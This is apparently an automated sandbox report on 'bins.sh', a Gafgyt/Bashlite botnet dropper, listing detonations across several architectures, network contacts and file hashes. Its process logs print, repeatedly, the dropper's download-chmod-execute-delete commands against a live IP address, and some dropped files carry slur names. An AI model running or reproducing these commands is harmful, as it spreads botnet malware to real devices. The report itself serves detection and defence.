Malware Analysis Report

2025-08-11 07:22

Sample ID: 240803-fhdwbstfkl
Target: bins.sh
SHA256: de36953ab2dd21eecd40090cdc4bdd7add909897c8835f20742df47d413cf7d3
Tags: gafgyt botnet
Score: 10/10


Analysis Overview

Score: 10/10

SHA256: de36953ab2dd21eecd40090cdc4bdd7add909897c8835f20742df47d413cf7d3

Threat Level: Known bad

The file bins.sh was found to be: Known bad.

Malicious Activity Summary

gafgyt botnet

Detected Gafgyt variant

Gafgyt/Bashlite

Executes dropped EXE

Reads system routing table

Reads system network configuration

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-08-03 04:52

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted: 2024-08-03 04:52
Reported: 2024-08-03 04:54
Platform: debian9-mipsbe-20240418-en
Max time kernel: 92s
Max time network: 16s

Command Line

[/tmp/bins.sh]

Signatures

Detected Gafgyt variant

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gafgyt/Bashlite

botnet gafgyt

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/boobs /tmp/boobs N/A
N/A /tmp/boobs2 /tmp/boobs2 N/A
N/A /tmp/roof /tmp/roof N/A
N/A /tmp/ppc /tmp/ppc N/A
N/A /tmp/sparc /tmp/sparc N/A
N/A /tmp/darkness /tmp/darkness N/A
N/A /tmp/arm5 /tmp/arm5 N/A
N/A /tmp/arm6 /tmp/arm6 N/A
N/A /tmp/NIGGA7 /tmp/NIGGA7 N/A

Reads system routing table

Description Indicator Process Target
File opened for reading /proc/net/route /tmp/boobs N/A

Reads system network configuration

Description Indicator Process Target
File opened for reading /proc/net/route /tmp/boobs N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boobs /usr/bin/wget N/A
File opened for modification /tmp/boobs2 /usr/bin/wget N/A
File opened for modification /tmp/roof /usr/bin/wget N/A
File opened for modification /tmp/sparc /usr/bin/wget N/A
File opened for modification /tmp/arm5 /usr/bin/wget N/A
File opened for modification /tmp/ppc /usr/bin/wget N/A
File opened for modification /tmp/darkness /usr/bin/wget N/A
File opened for modification /tmp/arm6 /usr/bin/wget N/A
File opened for modification /tmp/NIGGA7 /usr/bin/wget N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/usr/bin/wget

[wget http://93.123.85.216/boobs]

/bin/chmod

[chmod +x boobs]

/tmp/boobs

[./boobs]

/bin/rm

[rm -rf boobs]

/usr/bin/wget

[wget http://93.123.85.216/boobs2]

/bin/chmod

[chmod +x boobs2]

/tmp/boobs2

[./boobs2]

/bin/rm

[rm -rf boobs2]

/usr/bin/wget

[wget http://93.123.85.216/roof]

/bin/chmod

[chmod +x roof]

/tmp/roof

[./roof]

/bin/rm

[rm -rf roof]

/usr/bin/wget

[wget http://93.123.85.216/ppc]

/bin/chmod

[chmod +x ppc]

/tmp/ppc

[./ppc]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://93.123.85.216/sparc]

/bin/chmod

[chmod +x sparc]

/tmp/sparc

[./sparc]

/bin/rm

[rm -rf sparc]

/usr/bin/wget

[wget http://93.123.85.216/darkness]

/bin/chmod

[chmod +x darkness]

/tmp/darkness

[./darkness]

/bin/rm

[rm -rf darkness]

/usr/bin/wget

[wget http://93.123.85.216/arm5]

/bin/chmod

[chmod +x arm5]

/tmp/arm5

[./arm5]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://93.123.85.216/arm6]

/bin/chmod

[chmod +x arm6]

/tmp/arm6

[./arm6]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://93.123.85.216/NIGGA7]

/bin/chmod

[chmod +x NIGGA7]

/tmp/NIGGA7

[./NIGGA7]

/bin/rm

[rm -rf NIGGA7]

Network

Country Destination Domain Proto
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:39 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp

Files

/tmp/boobs

MD5 1f918589efbef4b04e806b7a38fc63f8
SHA1 758f7a47b66a52ce59462ffd1c0f223af618077c
SHA256 267bb586e092048c02e1533df5594bcdcb7d7bc45e1d7c249b624732af65b2b4
SHA512 d3d22ba6f725b0a02abd78ab62dd231b95ef17ed69376c836ab03bfc78f9e2c841b283c8eb0ee3adb4d4e7785b003afbd76197e965a6c2f09ed773d723132cbb

/tmp/boobs2

MD5 348a8f1c5535fe6a0a698f457c329485
SHA1 a3415c48c1d18776ab9a02ef23fe65cef88af354
SHA256 c11cdb76aa08f72fd9624c68a74776342c8eec86075bcfeca88c83d5d830c0e8
SHA512 e3ef6a9edc6f59eea05403785ef2bef8005248d0ec4f8714e733c1c895a6bd267e6f44c9409c4cd877a3b48dd92e7715ea00dec1e95193833234df0245e4991c

/tmp/roof

MD5 ca477454b7145f6d2180e32c6f0135f6
SHA1 da25e63ea1e5fed9abf321ddf4a82eaa76717bb6
SHA256 6a9406b7230fd0f2b6471bc341dba064b48959aa46e51759c3fafebd50e837d4
SHA512 561199819d8b51d51abc6a3fb786f45c28d5b04904efec549fddc4f35b36a45a66c54fb44d4a2f5c1139374c0f3bdd52f3abd565d67e383c25d338193e699d80

/tmp/ppc

MD5 5cf85a36699cca11be8c96c3232654e0
SHA1 897379599414d22c9adf9b542266eb6b888b6542
SHA256 d0fa6a48fc3767aa569af289cdd06699c183839f942465540a2bdc112e151419
SHA512 de9e55d3fec5bcb0791922ff7e2fc1addd8e76e83ad3a018cdd67cf3ddde2cc09571a520349361acf9024123ba5976bd68f1aaeec82693103149290bff6be552

/tmp/sparc

MD5 0e2c431d0b76d5d91af24cd90532cd93
SHA1 402554d878c7e73cdf145bb249c604a21e465e1f
SHA256 16c5cfb57ffcd3bd87e44f2c754d7fa6634c71cc06cf5d11a743d899cb546257
SHA512 8b0adab651805ea96e702e49013ae9e16d6858f0667bca352eefc12ae28d625f4a68135b915a14572ddec48ea22470e6d6dd9c91a2c4bfa03e35586ef6a246cc

/tmp/darkness

MD5 24393febb5e8a233a8df7f00b8c3b147
SHA1 f8240c5256c8a193ee8f2f93880203eca2f827d5
SHA256 49eaa16a775f35ae87b75eb7a31dc421adff1054ca3af19ec6a6c90e83f47d42
SHA512 be1ca8c139095fe4be2f8cbcdc4f5adf304e05a3f0f1f94b2c522957de0ce197b6ab8e16a17d1e3d8afbb06d9b3019bca134eeba3197bd6917fadb144a9a86c6

/tmp/arm5

MD5 e57c0097d80d17a52aad01a8c2e4f9fc
SHA1 fffadcdb51b879236df4d4cdf373216dd926e90e
SHA256 68a34ef0cc4e40fb5470c235ed5f2b583b619549b546dcfda3101d847f3e2f3a
SHA512 02e7100e343d14f88a1f68539dea16c633e8de9fb6859cf54c60873565f7666595a5ee131bc38ea5f5b306a740b7f8c8db68f3a124b77c9f63eee8f492d75464

/tmp/arm6

MD5 1e78f279e22858585947a52ad8b127d7
SHA1 62f68fbf960fd0bfda74d5d89d74cbf8eaa630f7
SHA256 616160f4a408c4dfe23d91f102a4f7db79e005b75013f34b4d0ea2e35a047377
SHA512 2d5439708fd887b3b9b79f877d0f1474c277b6459221726d428e96cdc1fdfea7665bdaab03c7a77df720713cc5eb9e90a5177f2c27212a2c5993b9338ce39921

/tmp/NIGGA7

MD5 658e8ab8f1bf7db543aa9b2b2fd595ce
SHA1 ce122d9bc9920bbd77826fcd7676f3081ec19752
SHA256 29e40415b4a7a270bd679a81ae16ab70c15d7a525b5701da5ce494600f60831c
SHA512 eb8056c08a88ce14bb4a028f9f93a70dfb54e0a83ac565ddb2c4d4ef8aeafba7b8105e4e14bd807ebcb46d987d625e3ccae655c3170ee5cc51b513a542e4984f

Analysis: behavioral4

Detonation Overview

Submitted: 2024-08-03 04:52
Reported: 2024-08-03 04:54
Platform: debian9-mipsel-20240729-en
Max time kernel: 92s
Max time network: 14s

Command Line

[/tmp/bins.sh]

Signatures

Detected Gafgyt variant

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gafgyt/Bashlite

botnet gafgyt

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/boobs /tmp/boobs N/A
N/A /tmp/boobs2 /tmp/boobs2 N/A
N/A /tmp/roof /tmp/roof N/A
N/A /tmp/ppc /tmp/ppc N/A
N/A /tmp/sparc /tmp/sparc N/A
N/A /tmp/darkness /tmp/darkness N/A
N/A /tmp/arm5 /tmp/arm5 N/A
N/A /tmp/arm6 /tmp/arm6 N/A
N/A /tmp/NIGGA7 /tmp/NIGGA7 N/A

Reads system routing table

Description Indicator Process Target
File opened for reading /proc/net/route /tmp/boobs2 N/A

Reads system network configuration

Description Indicator Process Target
File opened for reading /proc/net/route /tmp/boobs2 N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/roof /usr/bin/wget N/A
File opened for modification /tmp/ppc /usr/bin/wget N/A
File opened for modification /tmp/sparc /usr/bin/wget N/A
File opened for modification /tmp/darkness /usr/bin/wget N/A
File opened for modification /tmp/boobs /usr/bin/wget N/A
File opened for modification /tmp/boobs2 /usr/bin/wget N/A
File opened for modification /tmp/arm5 /usr/bin/wget N/A
File opened for modification /tmp/arm6 /usr/bin/wget N/A
File opened for modification /tmp/NIGGA7 /usr/bin/wget N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/usr/bin/wget

[wget http://93.123.85.216/boobs]

/bin/chmod

[chmod +x boobs]

/tmp/boobs

[./boobs]

/bin/rm

[rm -rf boobs]

/usr/bin/wget

[wget http://93.123.85.216/boobs2]

/bin/chmod

[chmod +x boobs2]

/tmp/boobs2

[./boobs2]

/bin/rm

[rm -rf boobs2]

/usr/bin/wget

[wget http://93.123.85.216/roof]

/bin/chmod

[chmod +x roof]

/tmp/roof

[./roof]

/bin/rm

[rm -rf roof]

/usr/bin/wget

[wget http://93.123.85.216/ppc]

/bin/chmod

[chmod +x ppc]

/tmp/ppc

[./ppc]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://93.123.85.216/sparc]

/bin/chmod

[chmod +x sparc]

/tmp/sparc

[./sparc]

/bin/rm

[rm -rf sparc]

/usr/bin/wget

[wget http://93.123.85.216/darkness]

/bin/chmod

[chmod +x darkness]

/tmp/darkness

[./darkness]

/bin/rm

[rm -rf darkness]

/usr/bin/wget

[wget http://93.123.85.216/arm5]

/bin/chmod

[chmod +x arm5]

/tmp/arm5

[./arm5]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://93.123.85.216/arm6]

/bin/chmod

[chmod +x arm6]

/tmp/arm6

[./arm6]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://93.123.85.216/NIGGA7]

/bin/chmod

[chmod +x NIGGA7]

/tmp/NIGGA7

[./NIGGA7]

/bin/rm

[rm -rf NIGGA7]

Network

Country Destination Domain Proto
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:39 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp

Files

/tmp/boobs

MD5 1f918589efbef4b04e806b7a38fc63f8
SHA1 758f7a47b66a52ce59462ffd1c0f223af618077c
SHA256 267bb586e092048c02e1533df5594bcdcb7d7bc45e1d7c249b624732af65b2b4
SHA512 d3d22ba6f725b0a02abd78ab62dd231b95ef17ed69376c836ab03bfc78f9e2c841b283c8eb0ee3adb4d4e7785b003afbd76197e965a6c2f09ed773d723132cbb

/tmp/boobs2

MD5 348a8f1c5535fe6a0a698f457c329485
SHA1 a3415c48c1d18776ab9a02ef23fe65cef88af354
SHA256 c11cdb76aa08f72fd9624c68a74776342c8eec86075bcfeca88c83d5d830c0e8
SHA512 e3ef6a9edc6f59eea05403785ef2bef8005248d0ec4f8714e733c1c895a6bd267e6f44c9409c4cd877a3b48dd92e7715ea00dec1e95193833234df0245e4991c

/tmp/roof

MD5 ca477454b7145f6d2180e32c6f0135f6
SHA1 da25e63ea1e5fed9abf321ddf4a82eaa76717bb6
SHA256 6a9406b7230fd0f2b6471bc341dba064b48959aa46e51759c3fafebd50e837d4
SHA512 561199819d8b51d51abc6a3fb786f45c28d5b04904efec549fddc4f35b36a45a66c54fb44d4a2f5c1139374c0f3bdd52f3abd565d67e383c25d338193e699d80

/tmp/ppc

MD5 5cf85a36699cca11be8c96c3232654e0
SHA1 897379599414d22c9adf9b542266eb6b888b6542
SHA256 d0fa6a48fc3767aa569af289cdd06699c183839f942465540a2bdc112e151419
SHA512 de9e55d3fec5bcb0791922ff7e2fc1addd8e76e83ad3a018cdd67cf3ddde2cc09571a520349361acf9024123ba5976bd68f1aaeec82693103149290bff6be552

/tmp/sparc

MD5 0e2c431d0b76d5d91af24cd90532cd93
SHA1 402554d878c7e73cdf145bb249c604a21e465e1f
SHA256 16c5cfb57ffcd3bd87e44f2c754d7fa6634c71cc06cf5d11a743d899cb546257
SHA512 8b0adab651805ea96e702e49013ae9e16d6858f0667bca352eefc12ae28d625f4a68135b915a14572ddec48ea22470e6d6dd9c91a2c4bfa03e35586ef6a246cc

/tmp/darkness

MD5 24393febb5e8a233a8df7f00b8c3b147
SHA1 f8240c5256c8a193ee8f2f93880203eca2f827d5
SHA256 49eaa16a775f35ae87b75eb7a31dc421adff1054ca3af19ec6a6c90e83f47d42
SHA512 be1ca8c139095fe4be2f8cbcdc4f5adf304e05a3f0f1f94b2c522957de0ce197b6ab8e16a17d1e3d8afbb06d9b3019bca134eeba3197bd6917fadb144a9a86c6

/tmp/arm5

MD5 e57c0097d80d17a52aad01a8c2e4f9fc
SHA1 fffadcdb51b879236df4d4cdf373216dd926e90e
SHA256 68a34ef0cc4e40fb5470c235ed5f2b583b619549b546dcfda3101d847f3e2f3a
SHA512 02e7100e343d14f88a1f68539dea16c633e8de9fb6859cf54c60873565f7666595a5ee131bc38ea5f5b306a740b7f8c8db68f3a124b77c9f63eee8f492d75464

/tmp/arm6

MD5 1e78f279e22858585947a52ad8b127d7
SHA1 62f68fbf960fd0bfda74d5d89d74cbf8eaa630f7
SHA256 616160f4a408c4dfe23d91f102a4f7db79e005b75013f34b4d0ea2e35a047377
SHA512 2d5439708fd887b3b9b79f877d0f1474c277b6459221726d428e96cdc1fdfea7665bdaab03c7a77df720713cc5eb9e90a5177f2c27212a2c5993b9338ce39921

/tmp/NIGGA7

MD5 658e8ab8f1bf7db543aa9b2b2fd595ce
SHA1 ce122d9bc9920bbd77826fcd7676f3081ec19752
SHA256 29e40415b4a7a270bd679a81ae16ab70c15d7a525b5701da5ce494600f60831c
SHA512 eb8056c08a88ce14bb4a028f9f93a70dfb54e0a83ac565ddb2c4d4ef8aeafba7b8105e4e14bd807ebcb46d987d625e3ccae655c3170ee5cc51b513a542e4984f

Analysis: behavioral1

Detonation Overview

Submitted: 2024-08-03 04:52
Reported: 2024-08-03 04:54
Platform: ubuntu1804-amd64-20240611-en
Max time kernel: 103s
Max time network: 128s

Command Line

[/tmp/bins.sh]

Signatures

Detected Gafgyt variant

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gafgyt/Bashlite

botnet gafgyt

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/boobs /tmp/boobs N/A
N/A /tmp/boobs2 /tmp/boobs2 N/A
N/A /tmp/roof /tmp/roof N/A
N/A /tmp/ppc /tmp/ppc N/A
N/A /tmp/sparc /tmp/sparc N/A
N/A /tmp/darkness /tmp/darkness N/A
N/A /tmp/arm5 /tmp/arm5 N/A
N/A /tmp/arm6 /tmp/arm6 N/A
N/A /tmp/NIGGA7 /tmp/NIGGA7 N/A

Reads system routing table

Description Indicator Process Target
File opened for reading /proc/net/route /tmp/roof N/A

Reads system network configuration

Description Indicator Process Target
File opened for reading /proc/net/route /tmp/roof N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boobs2 /usr/bin/wget N/A
File opened for modification /tmp/ppc /usr/bin/wget N/A
File opened for modification /tmp/sparc /usr/bin/wget N/A
File opened for modification /tmp/boobs /usr/bin/wget N/A
File opened for modification /tmp/roof /usr/bin/wget N/A
File opened for modification /tmp/darkness /usr/bin/wget N/A
File opened for modification /tmp/arm5 /usr/bin/wget N/A
File opened for modification /tmp/arm6 /usr/bin/wget N/A
File opened for modification /tmp/NIGGA7 /usr/bin/wget N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/usr/bin/wget

[wget http://93.123.85.216/boobs]

/bin/chmod

[chmod +x boobs]

/tmp/boobs

[./boobs]

/bin/rm

[rm -rf boobs]

/usr/bin/wget

[wget http://93.123.85.216/boobs2]

/bin/chmod

[chmod +x boobs2]

/tmp/boobs2

[./boobs2]

/bin/rm

[rm -rf boobs2]

/usr/bin/wget

[wget http://93.123.85.216/roof]

/bin/chmod

[chmod +x roof]

/tmp/roof

[./roof]

/bin/rm

[rm -rf roof]

/usr/bin/wget

[wget http://93.123.85.216/ppc]

/bin/chmod

[chmod +x ppc]

/tmp/ppc

[./ppc]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://93.123.85.216/sparc]

/bin/chmod

[chmod +x sparc]

/tmp/sparc

[./sparc]

/bin/rm

[rm -rf sparc]

/usr/bin/wget

[wget http://93.123.85.216/darkness]

/bin/chmod

[chmod +x darkness]

/tmp/darkness

[./darkness]

/bin/rm

[rm -rf darkness]

/usr/bin/wget

[wget http://93.123.85.216/arm5]

/bin/chmod

[chmod +x arm5]

/tmp/arm5

[./arm5]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://93.123.85.216/arm6]

/bin/chmod

[chmod +x arm6]

/tmp/arm6

[./arm6]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://93.123.85.216/NIGGA7]

/bin/chmod

[chmod +x NIGGA7]

/tmp/NIGGA7

[./NIGGA7]

/bin/rm

[rm -rf NIGGA7]

Network

Country Destination Domain Proto
NL 93.123.85.216:80 93.123.85.216 tcp
N/A 224.0.0.251:5353 udp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:39 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
GB 195.181.164.14:443 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp

Files

/tmp/boobs

MD5 1f918589efbef4b04e806b7a38fc63f8
SHA1 758f7a47b66a52ce59462ffd1c0f223af618077c
SHA256 267bb586e092048c02e1533df5594bcdcb7d7bc45e1d7c249b624732af65b2b4
SHA512 d3d22ba6f725b0a02abd78ab62dd231b95ef17ed69376c836ab03bfc78f9e2c841b283c8eb0ee3adb4d4e7785b003afbd76197e965a6c2f09ed773d723132cbb

/tmp/boobs2

MD5 348a8f1c5535fe6a0a698f457c329485
SHA1 a3415c48c1d18776ab9a02ef23fe65cef88af354
SHA256 c11cdb76aa08f72fd9624c68a74776342c8eec86075bcfeca88c83d5d830c0e8
SHA512 e3ef6a9edc6f59eea05403785ef2bef8005248d0ec4f8714e733c1c895a6bd267e6f44c9409c4cd877a3b48dd92e7715ea00dec1e95193833234df0245e4991c

/tmp/roof

MD5 ca477454b7145f6d2180e32c6f0135f6
SHA1 da25e63ea1e5fed9abf321ddf4a82eaa76717bb6
SHA256 6a9406b7230fd0f2b6471bc341dba064b48959aa46e51759c3fafebd50e837d4
SHA512 561199819d8b51d51abc6a3fb786f45c28d5b04904efec549fddc4f35b36a45a66c54fb44d4a2f5c1139374c0f3bdd52f3abd565d67e383c25d338193e699d80

/tmp/ppc

MD5 5cf85a36699cca11be8c96c3232654e0
SHA1 897379599414d22c9adf9b542266eb6b888b6542
SHA256 d0fa6a48fc3767aa569af289cdd06699c183839f942465540a2bdc112e151419
SHA512 de9e55d3fec5bcb0791922ff7e2fc1addd8e76e83ad3a018cdd67cf3ddde2cc09571a520349361acf9024123ba5976bd68f1aaeec82693103149290bff6be552

/tmp/sparc

MD5 0e2c431d0b76d5d91af24cd90532cd93
SHA1 402554d878c7e73cdf145bb249c604a21e465e1f
SHA256 16c5cfb57ffcd3bd87e44f2c754d7fa6634c71cc06cf5d11a743d899cb546257
SHA512 8b0adab651805ea96e702e49013ae9e16d6858f0667bca352eefc12ae28d625f4a68135b915a14572ddec48ea22470e6d6dd9c91a2c4bfa03e35586ef6a246cc

/tmp/darkness

MD5 24393febb5e8a233a8df7f00b8c3b147
SHA1 f8240c5256c8a193ee8f2f93880203eca2f827d5
SHA256 49eaa16a775f35ae87b75eb7a31dc421adff1054ca3af19ec6a6c90e83f47d42
SHA512 be1ca8c139095fe4be2f8cbcdc4f5adf304e05a3f0f1f94b2c522957de0ce197b6ab8e16a17d1e3d8afbb06d9b3019bca134eeba3197bd6917fadb144a9a86c6

/tmp/arm5

MD5 e57c0097d80d17a52aad01a8c2e4f9fc
SHA1 fffadcdb51b879236df4d4cdf373216dd926e90e
SHA256 68a34ef0cc4e40fb5470c235ed5f2b583b619549b546dcfda3101d847f3e2f3a
SHA512 02e7100e343d14f88a1f68539dea16c633e8de9fb6859cf54c60873565f7666595a5ee131bc38ea5f5b306a740b7f8c8db68f3a124b77c9f63eee8f492d75464

/tmp/arm6

MD5 1e78f279e22858585947a52ad8b127d7
SHA1 62f68fbf960fd0bfda74d5d89d74cbf8eaa630f7
SHA256 616160f4a408c4dfe23d91f102a4f7db79e005b75013f34b4d0ea2e35a047377
SHA512 2d5439708fd887b3b9b79f877d0f1474c277b6459221726d428e96cdc1fdfea7665bdaab03c7a77df720713cc5eb9e90a5177f2c27212a2c5993b9338ce39921

/tmp/NIGGA7

MD5 658e8ab8f1bf7db543aa9b2b2fd595ce
SHA1 ce122d9bc9920bbd77826fcd7676f3081ec19752
SHA256 29e40415b4a7a270bd679a81ae16ab70c15d7a525b5701da5ce494600f60831c
SHA512 eb8056c08a88ce14bb4a028f9f93a70dfb54e0a83ac565ddb2c4d4ef8aeafba7b8105e4e14bd807ebcb46d987d625e3ccae655c3170ee5cc51b513a542e4984f

Analysis: behavioral2

Detonation Overview

Submitted: 2024-08-03 04:52
Reported: 2024-08-03 04:54
Platform: debian9-armhf-20240611-en
Max time kernel: 101s
Max time network: 17s

Command Line

[/tmp/bins.sh]

Signatures

Detected Gafgyt variant

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gafgyt/Bashlite

botnet gafgyt

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/boobs /tmp/boobs N/A
N/A /tmp/boobs2 /tmp/boobs2 N/A
N/A /tmp/roof /tmp/roof N/A
N/A /tmp/ppc /tmp/ppc N/A
N/A /tmp/sparc /tmp/sparc N/A
N/A /tmp/darkness /tmp/darkness N/A
N/A /tmp/arm5 /tmp/arm5 N/A
N/A /tmp/arm6 /tmp/arm6 N/A
N/A /tmp/NIGGA7 /tmp/NIGGA7 N/A

Reads system routing table

Description Indicator Process Target
File opened for reading /proc/net/route /tmp/darkness N/A
File opened for reading /proc/net/route /tmp/arm5 N/A
File opened for reading /proc/net/route /tmp/arm6 N/A
File opened for reading /proc/net/route /tmp/NIGGA7 N/A

Reads system network configuration

Description Indicator Process Target
File opened for reading /proc/net/route /tmp/darkness N/A
File opened for reading /proc/net/route /tmp/arm5 N/A
File opened for reading /proc/net/route /tmp/arm6 N/A
File opened for reading /proc/net/route /tmp/NIGGA7 N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boobs /usr/bin/wget N/A
File opened for modification /tmp/roof /usr/bin/wget N/A
File opened for modification /tmp/ppc /usr/bin/wget N/A
File opened for modification /tmp/arm6 /usr/bin/wget N/A
File opened for modification /tmp/boobs2 /usr/bin/wget N/A
File opened for modification /tmp/sparc /usr/bin/wget N/A
File opened for modification /tmp/darkness /usr/bin/wget N/A
File opened for modification /tmp/arm5 /usr/bin/wget N/A
File opened for modification /tmp/NIGGA7 /usr/bin/wget N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/usr/bin/wget

[wget http://93.123.85.216/boobs]

/bin/chmod

[chmod +x boobs]

/tmp/boobs

[./boobs]

/bin/rm

[rm -rf boobs]

/usr/bin/wget

[wget http://93.123.85.216/boobs2]

/bin/chmod

[chmod +x boobs2]

/tmp/boobs2

[./boobs2]

/bin/rm

[rm -rf boobs2]

/usr/bin/wget

[wget http://93.123.85.216/roof]

/bin/chmod

[chmod +x roof]

/tmp/roof

[./roof]

/bin/rm

[rm -rf roof]

/usr/bin/wget

[wget http://93.123.85.216/ppc]

/bin/chmod

[chmod +x ppc]

/tmp/ppc

[./ppc]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://93.123.85.216/sparc]

/bin/chmod

[chmod +x sparc]

/tmp/sparc

[./sparc]

/bin/rm

[rm -rf sparc]

/usr/bin/wget

[wget http://93.123.85.216/darkness]

/bin/chmod

[chmod +x darkness]

/tmp/darkness

[./darkness]

/bin/rm

[rm -rf darkness]

/usr/bin/wget

[wget http://93.123.85.216/arm5]

/bin/chmod

[chmod +x arm5]

/tmp/arm5

[./arm5]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://93.123.85.216/arm6]

/bin/chmod

[chmod +x arm6]

/tmp/arm6

[./arm6]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://93.123.85.216/NIGGA7]

/bin/chmod

[chmod +x NIGGA7]

/tmp/NIGGA7

[./NIGGA7]

/bin/rm

[rm -rf NIGGA7]

Network

Country Destination Domain Proto
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:39 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:39 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:39 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:39 tcp

Files

/tmp/boobs

MD5 1f918589efbef4b04e806b7a38fc63f8
SHA1 758f7a47b66a52ce59462ffd1c0f223af618077c
SHA256 267bb586e092048c02e1533df5594bcdcb7d7bc45e1d7c249b624732af65b2b4
SHA512 d3d22ba6f725b0a02abd78ab62dd231b95ef17ed69376c836ab03bfc78f9e2c841b283c8eb0ee3adb4d4e7785b003afbd76197e965a6c2f09ed773d723132cbb

/tmp/boobs2

MD5 348a8f1c5535fe6a0a698f457c329485
SHA1 a3415c48c1d18776ab9a02ef23fe65cef88af354
SHA256 c11cdb76aa08f72fd9624c68a74776342c8eec86075bcfeca88c83d5d830c0e8
SHA512 e3ef6a9edc6f59eea05403785ef2bef8005248d0ec4f8714e733c1c895a6bd267e6f44c9409c4cd877a3b48dd92e7715ea00dec1e95193833234df0245e4991c

/tmp/roof

MD5 ca477454b7145f6d2180e32c6f0135f6
SHA1 da25e63ea1e5fed9abf321ddf4a82eaa76717bb6
SHA256 6a9406b7230fd0f2b6471bc341dba064b48959aa46e51759c3fafebd50e837d4
SHA512 561199819d8b51d51abc6a3fb786f45c28d5b04904efec549fddc4f35b36a45a66c54fb44d4a2f5c1139374c0f3bdd52f3abd565d67e383c25d338193e699d80

/tmp/ppc

MD5 5cf85a36699cca11be8c96c3232654e0
SHA1 897379599414d22c9adf9b542266eb6b888b6542
SHA256 d0fa6a48fc3767aa569af289cdd06699c183839f942465540a2bdc112e151419
SHA512 de9e55d3fec5bcb0791922ff7e2fc1addd8e76e83ad3a018cdd67cf3ddde2cc09571a520349361acf9024123ba5976bd68f1aaeec82693103149290bff6be552

/tmp/sparc

MD5 0e2c431d0b76d5d91af24cd90532cd93
SHA1 402554d878c7e73cdf145bb249c604a21e465e1f
SHA256 16c5cfb57ffcd3bd87e44f2c754d7fa6634c71cc06cf5d11a743d899cb546257
SHA512 8b0adab651805ea96e702e49013ae9e16d6858f0667bca352eefc12ae28d625f4a68135b915a14572ddec48ea22470e6d6dd9c91a2c4bfa03e35586ef6a246cc

/tmp/darkness

MD5 24393febb5e8a233a8df7f00b8c3b147
SHA1 f8240c5256c8a193ee8f2f93880203eca2f827d5
